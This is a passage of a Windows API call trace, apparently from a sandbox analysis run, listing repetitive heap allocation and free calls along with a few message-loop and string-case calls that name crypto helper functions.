lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0190.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3ead) returned 0xbeded0 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.966] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0190.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0190.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0190.966] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0190.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0190.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.967] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0190.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0190.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.967] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.968] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.969] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0190.970] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.971] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 